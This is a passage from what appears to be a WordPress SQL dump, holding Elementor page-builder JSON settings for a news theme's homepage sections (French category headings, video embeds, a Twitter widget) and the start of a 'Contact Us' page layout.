\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"300\",\"twitter_widget_tweet_limit\":\"2\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(492,360,'_elementor_version','0.4'),(493,361,'_elementor_template_type','page'),(494,361,'_elementor_edit_mode','builder'),(495,361,'_elementor_data','[{\"id\":\"gjreoyl\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"classic\",\"background_color\":\"\",\"background_image\":{\"id\":358,\"url\":\"http:\\/\\/demo7.magzma.com\\/wp-content\\/uploads\\/sites\\/8\\/2017\\/02\\/photo-1469920783271-4ee08a94d42d.jpg\"},\"background_position\":\"center left\",\"background_attachment\":\"scroll\",\"background_repeat\":\"\",\"background_size\":\"cover\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#000000\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":\"0.9\"},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"ebhzbvx\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"rnsxoek\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"1\",\"the_title\":\"Contact Us\",\"title_size\":\"h2\",\"typography_title_typography\":\"\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"center\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"#ffffff\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e1e1e1\",\"text_bg_color_7\":\"#61c436\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"tnzayvk\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"800\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"